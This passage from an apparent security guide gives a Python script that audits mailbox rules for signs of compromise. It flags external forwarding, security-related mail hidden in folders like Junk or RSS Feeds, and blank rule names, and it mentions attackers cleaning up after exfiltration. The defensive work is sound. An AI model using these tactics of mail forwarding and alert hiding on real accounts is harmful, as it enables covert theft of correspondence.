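 {"Mailbox": "carol@corp.example", "Name": "Newsletters", "Enabled": true,
  "ForwardTo": [], "RedirectTo": [], "MoveToFolder": "Newsletters",
  "SubjectContainsWords": ["newsletter"], "DeleteMessage": false},
 {"Mailbox": "dave@corp.example", "Name": "Old forward", "Enabled": false,
  "ForwardTo": ["dave.home@mail.example"], "RedirectTo": [], "MoveToFolder": "",
  "SubjectContainsWords": [], "DeleteMessage": false}
]"""

INTERNAL_DOMAINS = {"corp.example"}  # assumption: the organisation's own mail domains
UNWATCHED_FOLDERS = {"rss feeds", "rss subscriptions", "junk email", "deleted items",
                     "conversation history"}
SECURITY_WORDS = {"phish", "hack", "suspicious", "password", "malware", "security",
                  "fraud", "compromis"}


def is_external(address):
    return address.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS


def audit_rule(rule):
    """Findings for one rule; an empty list means nothing unusual."""
    findings = []
    for target in rule.get("ForwardTo", []) + rule.get("RedirectTo", []):
        if is_external(target):
            findings.append(f"forwards or redirects mail outside the organisation to {target}")
    words = [w.lower() for w in rule.get("SubjectContainsWords", [])]
    hits = sorted(w for w in words if any(s in w for s in SECURITY_WORDS))
    folder = rule.get("MoveToFolder", "").lower()
    if hits and (folder in UNWATCHED_FOLDERS or rule.get("DeleteMessage")):
        where = rule.get("MoveToFolder") or "Deleted Items"
        findings.append(f"hides security-related mail ({', '.join(hits)}) in '{where}'")
    if len(rule.get("Name", "").strip()) <= 1:
        findings.append("rule name is empty or a single character")
    return findings


def audit(rules_json):
    """Audit every enabled rule; returns (mailbox, rule name, findings) tuples."""
    report = []
    for rule in json.loads(rules_json):
        if not rule.get("Enabled", True):
            continue
        findings = audit_rule(rule)
        if findings:
            report.append((rule["Mailbox"], rule["Name"], findings))
    return report


if __name__ == "__main__":
    for mailbox, name, findings in audit(RULES_JSON):
        print(f"{mailbox} rule '{name}':")
        for finding in findings:
            print("   -", finding)
```

Disabled rules are skipped here so the report stays short, but a rule that was recently disabled or deleted is itself worth a look in the audit log: attackers who have finished exfiltrating sometimes clean up after themselves.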

CISA also published recommended mitigations that organizations can use to strengthen their cloud environment configurations in order to protect against, detect, and respond to such attacks, together with the attackers' tactics, techniques, and procedures (TTPs) to help security teams counter them.